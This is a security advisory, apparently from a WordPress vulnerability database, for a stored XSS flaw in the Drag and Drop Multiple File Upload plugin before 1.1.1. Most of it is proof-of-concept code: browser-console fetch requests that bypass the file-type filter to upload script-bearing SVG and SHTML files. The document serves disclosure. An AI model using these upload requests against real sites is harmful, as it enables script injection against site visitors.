WordPress Plugin Vulnerabilities
Drag and Drop Multiple File Upload < 1.1.1 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not filter all potentially dangerous file extensions. Therefore, an attacker can upload unsafe .shtml or .svg files containing malicious scripts.
Proof of Concept
# Using malicious SVG files: Go to a product page that features the file upload form, and paste the following in your browser console: ``` fetch("/wp-admin/admin-ajax.php", { "credentials": "omit", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656" }, "referrer": "http://wpscan-vulnerability-test-bench.ddev.site/product/catapult/", "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|svg\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.svg\"\r\nContent-Type: image/jpeg\r\n\r\n<?xml version=\"1.0\" standalone=\"no\"?><!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"><svg version=\"1.1\" baseProfile=\"full\" xmlns=\"http://www.w3.org/2000/svg\"><polygon id=\"triangle\" points=\"0,0 0,50 50,0\" fill=\"#009900\" stroke=\"#004400\"/><script type=\"text/javascript\">alert(\"XSS\");</script></svg>\n\r\n-----------------------------4807439943981355138852449656--\r\n`, "method": "POST", "mode": "cors" }).then(x=>x.text()).then(x=>console.log(x)); ``` You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.svg # Using malicious SHTML files: Go to a product page that features the file upload form, and paste the following in your browser console: ``` fetch("/wp-admin/admin-ajax.php", { "credentials": "omit", "headers": { "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------4807439943981355138852449656" }, "body": `-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\njpg|jpeg|png|gif|pdf|doc|docx|xls|xlsx|stl|mp4|mp3|zip|shtml\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n10485760\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ndnd_codedropz_upload_wc\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n${dnd_wc_uploader.nonce}\r\n-----------------------------4807439943981355138852449656\r\nContent-Disposition: form-data; name=\"dnd-wc-upload-file\"; filename=\"xss.shtml\"\r\nContent-Type: image/jpeg\r\n\r\n<script>alert(1);</script>\n\r\n-----------------------------4807439943981355138852449656--\r\n`, "method": "POST", "mode": "cors" }).then(x=>x.text()).then(x=>console.log(x)); ``` You can then access the malicious file at http://vulnerable-site.tld/wp-content/uploads/wc_drag-n-drop_uploads/xss.shtml
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Zeyad Alshahrani
Submitter
Zeyad Alshahrani
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-09-21 (about 7 months ago)
Added
2023-09-21 (about 7 months ago)
Last Updated
2023-09-21 (about 7 months ago)